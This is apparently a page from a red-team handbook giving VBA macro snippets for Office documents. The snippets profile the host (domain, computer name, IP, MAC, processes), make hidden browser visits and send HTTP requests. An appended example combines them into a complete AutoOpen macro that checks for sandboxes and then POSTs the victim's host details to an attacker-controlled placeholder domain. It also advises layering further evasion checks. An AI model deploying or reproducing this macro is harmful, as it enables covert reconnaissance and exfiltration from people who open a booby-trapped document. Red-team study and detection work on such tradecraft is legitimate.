The Red Team Vade Mecum
Info Extraction

These snippets extract information from the host with VBA. The results can feed sandbox-evasion checks (bail out when the machine is not domain-joined, has very few processes, and so on) or simply profile the user before the real payload is dropped. Note that all of them instantiate COM objects (WScript.Network, winmgmts, InternetExplorer.Application, MSXML2/WinHttp) at runtime, so Office's AMSI integration for VBA logs those calls regardless of how the macro source itself is obfuscated.

Extracting domain and computer name:

Dim wshNetwork As Object
Set wshNetwork = CreateObject("Wscript.Network")
' UserDomain equals the computer name on a workgroup (non-domain-joined) machine
strUserDomain = wshNetwork.UserDomain
strCompName = wshNetwork.ComputerName

Extracting MAC and IP

Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set cItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True")
For Each oItem In cItems
	' IPAddress is an array (IPv4 and IPv6 entries); take the first adapter that has one
	If Not IsNull(oItem.IPAddress) Then
		myMacAddress = oItem.MACAddress
		myIPAddress = oItem.IPAddress(0)
		Exit For
	End If
Next

A compact name:PID list can be built from the same WMI connection (the longer variant further down returns executable paths instead):

Set objProcessSet = objWMIService.ExecQuery("SELECT Name, ProcessId FROM Win32_Process")
For Each Process In objProcessSet
	ProcessStr = ProcessStr & Process.Properties_("Name").Value & ":" & Process.Properties_("ProcessId").Value & "|"
Next

Visit Url

Here are some more VBA tricks. The one below visits a URL in a hidden Internet Explorer window; note that it spawns an iexplore.exe child of the Office process, which is an easy thing to alert on, and on hosts where IE has been retired the COM object may hand the navigation off to Edge or fail.

Dim objIE As Object
Set objIE = CreateObject("InternetExplorer.Application")
With objIE
    .Visible = False
    .Navigate "https://www.silentbreaksecurity.com"
    Do While .ReadyState <> 4: DoEvents: Loop
    .Quit
End With

This unhides all text in a Word document (Selection.WholeStory is Word-only), which is useful when the document body carries hidden content that the macro needs to reveal or read:

Selection.WholeStory
With Selection.Font
    .Hidden = False
End With

Get a process list

Dim Service As Object, List As Object
Set Service = GetObject("winmgmts:\\.\root\cimv2")

Set List = Service.ExecQuery("SELECT * FROM Win32_Process")
Dim result As String
Dim Process As Object
For Each Process In List
    ' Prefer the full path; some system processes expose only a name
    If Len(Process.ExecutablePath) > 0 Then
        result = result & Process.ExecutablePath & vbNewLine
    ElseIf Len(Process.Name) > 0 Then
        result = result & Process.Name & vbNewLine
    End If
Next

HTTP Request

Sub WebRequest()
    Dim Url As String, objHTTP As Object, winHttpReq As Object
    Url = "http://<yourdomain>/"
    On Error GoTo Request2
    Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
    ' Very short timeouts (resolve, connect, send, receive), in milliseconds; increase if needed
    objHTTP.setTimeouts 100, 100, 100, 100
    ' GET for example; any other HTTP verb works. For a POST, pass the body as the argument to Send (else you post an empty body)
    objHTTP.Open "GET", Url, False
    objHTTP.Send
    Set objHTTP = Nothing
    Exit Sub
Request2:
    ' Fallback handler: switch the URL, or switch from ServerXMLHTTP to WinHttp.
    ' To chain further handlers, reset the active handler with On Error GoTo -1 first
    On Error GoTo -1
    'On Error GoTo Request3
    'You can change the URL here if you want
    Set winHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    winHttpReq.Open "GET", Url, False
    winHttpReq.Send
End Sub
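Putting the pieces together, as an added example that is not part of the original page: a macro that uses the domain/computer-name and process-list snippets above as a sandbox check, then POSTs the gathered details using the MSXML2.ServerXMLHTTP / WinHttp fallback pattern from the HTTP Request section, passing the body as the argument to Send as that section notes. The `http://<yourdomain>/` placeholder is the page's own; the process-count threshold, the function names and the `text/plain` body format are assumptions made for illustration.

```vba
' Added example, not from the original page. The URL placeholder comes from the
' HTTP Request section; the threshold, helper names and body format are assumptions.
Option Explicit

' Heuristic sandbox check built from the information gathered above.
' Returns True when the host looks like an analysis VM.
Private Function LooksLikeSandbox() As Boolean
    Dim wshNetwork As Object, svc As Object, procs As Object
    Dim procCount As Long

    Set wshNetwork = CreateObject("Wscript.Network")
    ' A workgroup machine reports its own name as the domain; real targets are usually domain-joined
    If UCase(wshNetwork.UserDomain) = UCase(wshNetwork.ComputerName) Then
        LooksLikeSandbox = True
        Exit Function
    End If

    Set svc = GetObject("winmgmts:\\.\root\cimv2")
    Set procs = svc.ExecQuery("SELECT ProcessId FROM Win32_Process")
    procCount = procs.Count
    ' Assumed threshold: an interactive user session normally runs well over 40 processes
    If procCount < 40 Then LooksLikeSandbox = True
End Function

' Collect host details as one string: domain|computer|name:pid|name:pid|...
Private Function CollectHostInfo() As String
    Dim wshNetwork As Object, svc As Object, procs As Object, p As Object
    Dim info As String

    Set wshNetwork = CreateObject("Wscript.Network")
    info = wshNetwork.UserDomain & "|" & wshNetwork.ComputerName & "|"

    Set svc = GetObject("winmgmts:\\.\root\cimv2")
    Set procs = svc.ExecQuery("SELECT Name, ProcessId FROM Win32_Process")
    For Each p In procs
        info = info & p.Name & ":" & p.ProcessId & "|"
    Next
    CollectHostInfo = info
End Function

' POST the collected string. With POST the body goes as the argument to Send;
' a bare .Send would post an empty body. Falls back to WinHttp if MSXML2 fails.
Private Function PostInfo(ByVal Url As String, ByVal body As String) As Boolean
    Dim req As Object
    On Error GoTo Fallback
    Set req = CreateObject("MSXML2.ServerXMLHTTP")
    req.setTimeouts 2000, 2000, 2000, 2000   ' resolve, connect, send, receive (ms)
    req.Open "POST", Url, False
    req.setRequestHeader "Content-Type", "text/plain"
    req.Send body
    PostInfo = (req.Status = 200)
    Exit Function
Fallback:
    ' Reset the active handler before installing a new one, as the section above describes
    On Error GoTo -1
    On Error Resume Next
    Set req = CreateObject("WinHttp.WinHttpRequest.5.1")
    req.Open "POST", Url, False
    req.setRequestHeader "Content-Type", "text/plain"
    req.Send body
    PostInfo = (Err.Number = 0 And req.Status = 200)
End Function

' Word entry point (use Auto_Open or Workbook_Open for Excel)
Sub AutoOpen()
    If LooksLikeSandbox() Then Exit Sub
    Call PostInfo("http://<yourdomain>/", CollectHostInfo())
End Sub
```

The sandbox check runs before any network activity, so an analysis VM that trips either heuristic never sees the beacon. Both heuristics are cheap to defeat (a domain-joined sandbox with padded process count), so treat them as a first filter and stack them with the other checks from the Sandbox Evasion section rather than relying on either alone.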

Last updated 3 years ago
